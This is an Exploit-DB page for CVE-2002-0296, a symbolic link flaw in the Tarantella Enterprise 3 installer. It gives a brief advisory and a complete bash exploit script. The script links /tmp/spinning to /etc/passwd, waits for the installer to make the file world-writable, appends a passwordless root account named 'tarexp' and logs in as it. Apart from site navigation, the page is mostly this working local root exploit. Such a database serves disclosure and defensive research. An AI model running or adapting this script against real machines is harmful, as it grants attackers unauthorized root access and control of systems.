Tarantella Enterprise 3 - Symbolic Link

EDB-ID:

21290

CVE:

2002-0296

EDB Verified:

Author:

Larry W. Cashdollar

Type:

local

Exploit:   /  

Platform:

Unix

Date:

2002-02-19

Vulnerable App: 
source: https://www.securityfocus.com/bid/4115/info

Tarantella Enterprise 3 contains a locally exploitable symbolic link vulnerability during it's installation procedure.

This vulnerability can be exploited to elevate privileges. An attacker anticipating the install of Tarantella could create a symbolic link to any file as '/tmp/spinning'. When the installation utility is run, the file pointed to by the link will be made world writeable.

The attacker may gain root privileges by overwriting a file such as '/etc/passwd'.

#!/bin/bash
#Larry W. Cashdollar  lwc@vapid.dhs.org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux.  run and wait.


echo "Creating symlink."

/bin/ln -s /etc/passwd /tmp/spinning

echo "Waiting for tarantella installation."

while true
do
echo -n .
if [ -w /etc/passwd ]
then
        echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        su - tarexp
        exit
fi
done
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services